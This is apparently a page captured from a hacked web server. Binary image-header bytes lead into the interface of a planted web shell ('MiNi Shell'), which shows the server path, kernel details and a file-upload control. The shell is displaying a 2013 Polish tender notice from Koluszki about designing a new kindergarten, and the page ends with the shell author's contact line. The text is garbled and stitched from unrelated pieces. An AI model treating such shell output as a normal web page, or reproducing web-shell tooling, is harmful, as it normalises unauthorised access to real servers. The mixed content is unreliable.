JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131031/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131031/229717-N-2013.html

<p class="kh_header"><b>Koluszki: Wykonanie kompletnej  dokumentacji  projektowo - kosztorysowej  na  budowę nowego budynku Przedszkola  nr 1 wraz z zagospodarowaniem terenu  działki  mieszczącej  
się  w  Koluszkach  przy  ul. Budowlanych 10/ 12.</b><br>
<b>Numer ogłoszenia: 229717 - 2013; data zamieszczenia: 31.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Koluszkach , ul. 11-go Listopada 65, 95-040 Koluszki, woj. łódzkie, tel. 044 7256700, faks 044 7145840.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.koluszki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie kompletnej  dokumentacji  projektowo - kosztorysowej  na  budowę nowego budynku Przedszkola  nr 1 wraz z zagospodarowaniem terenu  działki  mieszczącej  
się  w  Koluszkach  przy  ul. Budowlanych 10/ 12..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1) Przedmiotem niniejszego zamówienia jest wykonanie  kompletnej  dokumentacji     projektowo - kosztorysowej  na  budowę nowego budynku  Przedszkola  nr 1 wraz 
z zagospodarowaniem terenu  działki mieszczącej  się  w  Koluszkach  przy  
ul. Budowlanych 10/ 12 oraz uzyskaniem  wszystkich  niezbędnych  pozwoleń, opinii,  uzgodnień  i  pełnieniem  nadzoru  autorskiego nad wykonaną  dokumentacją. 
2)  Budynek  przedszkola  powinien  być  dostosowany  pod  względem  funkcjonalno  - użytkowym  oraz kubaturowym,  tak  aby  można  w  nim  utworzyć  planowane  
oddziały  przedszkolne na  ogółem 100 dzieci  wraz z  niezbędnymi  pomieszczeniami:  tj. dodatkową  salą do ćwiczeń  ruchowych  i  rytmicznych,  salą do leżakowania dla  najmłodszej  grupy, pomieszczeniami  ogólnego  przeznaczenia,  pokojami administracyjnymi,  szatniami, łazienkami, komunikacją,  pomieszczeniami  gospodarczo -magazynowymi, oraz pełnym  aneksem kuchennym wraz  
z wyposażeniem  sanitarnym  niezbędnym  do przygotowania  posiłków.
3) Projektowany  budynek  przedszkola  musi  mieć minimum  jedną przesuwną ścianę  wewnętrzną  tak, aby w przypadku  konieczności  organizacji  większej  imprezy można było  połączyć i wykorzystać dwa  sąsiadujące  ze  sobą pomieszczenia.
4) Projektowany  budynek  powinien  być wyposażony  we  wszystkie niezbędne instalację  i  media, a  w szczególności: 
a) wewnętrzną  instalację  elektryczną  w budynku  oraz  oświetlenie  terenu  wokół  budynku  w  niezbędnym  zakresie,
b) wykonanie  węzła  cieplnego  z  rozprowadzeniem  wewnętrznej   instalacji  centralnego  ogrzewania,  oraz ciepłej  wody  użytkowej,    
c) doprowadzenie  przyłączy  wodociągowych  i  kanalizacyjnych  do  budynku, 
( media  znajdują  się  przy działce  w  ulicy  Budowlanych  w Koluszkach) 
d) rozprowadzenie  instalacji  wodociągowo - kanalizacyjnej  wewnątrz  budynku,
e) rozprowadzenie  instalacji  gazowej  wewnątrz  projektowanego budynku,
f) rozprowadzenie wewnętrznej  instalacji  komputerowej  w niezbędnym  zakresie,   
g) rozprowadzenie  instalacji  telefonicznej  i  internetowej  wewnątrz  budynku   (w  niezbędnym  zakresie ),
h) instalację  alarmową  włamania   i  napadu  oraz  monitoringu, 
i)  instalację  wentylacji  budynku,
j)  instalację  odgromową.
k) odwodnienie  budynku  i  działki  w  niezbędnym  zakresie.  
5) Wykonanie   projektów  architektoniczno  -  budowlanych  zagospodarowania  terenu  wokół  budynku  zawierających:  utwardzenie  terenu  wraz z komunikacją,  wewnętrznymi  drogami  dojazdowymi  do budynku,  parkingiem,  ogrodzeniem  terenu,  placem  zabaw dla  dzieci,  wydzieleniem  terenu  zieleni   ( bez projektu nasadzeń  roślin  i  krzewów ),     
6)  Wykonanie  projektu  aranżacji  i  stałego  wyposażenia  pomieszczeń:  kuchni  
i  szatni.
7) Budynek  przedszkola  wraz ze wszystkimi  instalacjami  oraz zagospodarowaniem  terenu musi  być tak zaprojektowany,  aby  był  kompletny  z  punktu  widzenia  celu  jakiemu  ma  służyć, bez konieczności   wykonania  dodatkowych  opracowań..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.07.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna  ten warunek  za  spełniony  na podstawie  podpisanych  oświadczeń: o  spełnieniu  warunków  udziału w  postępowaniu  o  których  mowa  
w art. 22 ust. 1 i  braku  podstaw  do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2   Ustawy  Prawo  Zamówień  Publicznych,  oraz  gdy Wykonawca  załączy  aktualny  odpis  z  właściwego  rejestru  lub  Centralnej  Ewidencji  i  Informacji  o Działalności Gospodarczej Rzeczpospolitej Polskiej,  jeżeli odrębne przepisy wymagają  wpisu  do  rejestru lub ewidencji  wystawionego  nie  wcześniej  niż  6 miesięcy przed upływem  terminu  składania  ofert.  
Ocena  spełnienia  warunków  będzie  dokonywana  na  podstawie złożonych dokumentów  i  oświadczeń na  zasadzie:  spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna  ten  warunek  za  spełniony  na  podstawie  podpisanego  oświadczenie  o  spełnieniu  warunków  udziału  w  postępowaniu  o  których mowa  
w  art. 22 ust. 1 Ustawy  Prawo  Zamówień  Publicznych., oraz  gdy  wykonawcy wykażą, że posiadają  doświadczenie  polegające  na  wykonaniu  w  ciągu ostatnich 3  lat przed upływem  terminu składania ofert,  a  w  przypadku,  gdy okres prowadzenia  działalności  jest  krótszy - w  tym okresie  minimum  dwóch  dokumentacji  projektowych dotyczących budowy  nowego  budynku,  lub  przebudowy,  rozbudowy, remontu  istniejącego  budynku  o powierzchni  użytkowej  nie  mniejszej  niż  800 m2,  w  którym projektowane  były  nowe,  lub  modernizowane  istniejące  pomieszczenia  kuchenne  wraz  z wyposażeniem  sanitarnym  niezbędnym  do  przygotowania  posiłków.
Ocena  spełnienia  warunków  będzie  dokonywana  na  podstawie złożonych dokumentów  i  oświadczeń na  zasadzie:  spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna  ten  warunek  za  spełniony na  podstawie  podpisanego  oświadczenie  o  spełnieniu   warunków  udziału  w  postępowaniu  o  których mowa  
w  art. 22 ust. 1  Ustawy  Prawo  Zamówień  Publicznych.
Ocena  spełnienia  warunków  będzie  dokonywana  na  podstawie złożonych dokumentów  i  oświadczeń na  zasadzie:  spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna   ten  warunek  za  spełniony  na  podstawie  podpisanego  oświadczenia  o  spełnieniu  warunków  udziału  w  postępowaniu  o  których mowa  
w  art. 22 ust. 1 Ustawy  Prawo Zamówień  Publicznych, oraz  gdy  Wykonawca  dysponuje  lub  będzie  dysponował  osobami, które będą uczestniczyć  
w  wykonaniu  zamówienia,  i  osoby  te posiadają  uprawnienia  budowlane  
do projektowania w następujących  specjalnościach :  
a) architektonicznej - minimum 1 osoba,
b) konstrukcyjno -  budowlanej  -  minimum 1 osoba,
c) instalacyjnej  w  zakresie sieci  i  urządzeń  wodociągowo - kanalizacyjnych,  sieci  i  urządzeń  gazowych,  centralnego  ogrzewania  oraz  wentylacji -       
minimum  1 osoba,
d) instalacyjnej   w zakresie  sieci  i  urządzeń  elektrycznych - minimum 1 osoba. 
Uprawnienia budowlane powinny być zgodnie z art. 12 a ustawy z dnia 7 lipca 1994 r. Prawo budowlane ( Dz. U. z  2010 r. Nr 243  poz. 1623 z późniejszymi  zmianami).
Ocena  spełnienia  warunków  będzie  dokonywana  na  podstawie złożonych dokumentów i oświadczeń na  zasadzie: spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna  ten  warunek  za  spełniony  na  podstawie   podpisanego  oświadczenia  o  spełnieniu   warunków  udziału w  postępowaniu  o  których mowa  
w  art. 22 ust. 1  Ustawy  Prawo  Zamówień  Publicznych.
Ocena  spełnienia  warunków  będzie  dokonywana  na  podstawie złożonych dokumentów i oświadczeń na  zasadzie: spełnia / nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Wypełniony formularz oferty 
2) Wypełniony formularz  cen  jednostkowych 
3) W  przypadku, gdy Wykonawca  będzie korzystał z  wiedzy  i  doświadczenia, potencjału  technicznego, osób  zdolnych  do  wykonania  zamówienia  innych podmiotów, zobowiązany  jest przedstawić  pisemne  zobowiązanie  tych podmiotów  do oddania  mu  do  dyspozycji niezbędnych  zasobów  na  okres korzystania z nich  przy wykonywaniu zamówienia. 
4) W  przypadku, gdy  podmioty  występują  wspólnie  Wykonawcy  powinni  ustanowić  pełnomocnika do  reprezentowania  ich  w  postępowaniu  o udzielenie zamówienia, albo reprezentowania w postępowaniu i zawarcia umowy  
w sprawie zamówienia publicznego.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.  Zamawiający  dopuszcza  zmianę postanowień  zawartej  umowy  w  stosunku do treści  oferty  na  podstawie której dokonano wyboru Wykonawcy  w następujących przypadkach:
1)  w  uzasadnionych  przypadkach  niezależnych  od  Zamawiającego  lub  Wykonawcy  a w  szczególności : 
a) działania  siły  wyższej,  uniemożliwiającej  wykonanie umowy w umówionym terminie - o okres niezbędny  do usunięcia  skutków działania siły  wyższej.
b) wystąpienia  niezależnego  od  wykonawcy  przedłużenia się  terminu  pozyskiwania  uzgodnień  oraz  warunków  do projektowania od: dysponentów mediów,  Z.U.D.P,  i  innych  właściwych  organów  i  instytucji -  o  najdłuższy  okres czasu  przez  jaki  okoliczności  te  wystąpiły,
c) przedłużenia się pozyskiwania wszelkich  uzgodnień  i  decyzji niezbędnych do otrzymania koniecznych uzgodnień i pozwolenia na budowę  trwającego ponad dwa miesiące od daty złożenia poszczególnych opracowań lub dokumentów do uzgodnienia we właściwej instytucji -  o  okres  czasu  opóźnienia  otrzymania koniecznych uzgodnień i  pozwolenia  na  budowę,  kiedy  konieczna  będzie  zmiana  terminu  realizacji  zamówienia,  Zamawiający  na  pisemny  wniosek  Wykonawcy  może  wydłużyć  termin  realizacji  tego  zamówienia,
2)  w  innych  uzasadnionych  przypadkach,  gdy  zajdzie  konieczność wprowadzenia  do  umowy  koniecznych  zmian  wynikających  z okoliczności,  których nie  można  było przewidzieć  w  chwili  zawarcia  umowy  a  w szczególności  zmiany  Projektantów,  Zamawiający  za  zgodą  lub  na  wniosek  Wykonawcy  może  dokonać  takiej  zmiany. 
3)  w  przypadku,  gdy zmiany  postanowień  zawartej  umowy będą  korzystne dla Zamawiającego,  a  zmiany  te  wynikły  w  trakcie  realizacji  zamówienia, Zamawiający  za zgodą  Wykonawcy  może  dokonać  takiej  zmiany.
4) w  przypadku  ustawowej  zmiany  stawki  podatku  od   towarów  i  usług  ( VAT) cena  netto  pozostanie  bez  zmian,  a  kwota  podatku VAT  i  wartość  brutto zostanie  odpowiednio  skorygowana  zgodnie  z  aktualnie  obowiązującymi przepisami  podatkowymi.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.koluszki.samorzady.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w  Koluszkach przy ul 11 Listopada 65  pok nr 203.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.11.2013 godzina 09:30, miejsce: kancelaria  Urzędu  Miejskiego w  Koluszkach przy ul 11 Listopada 65.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com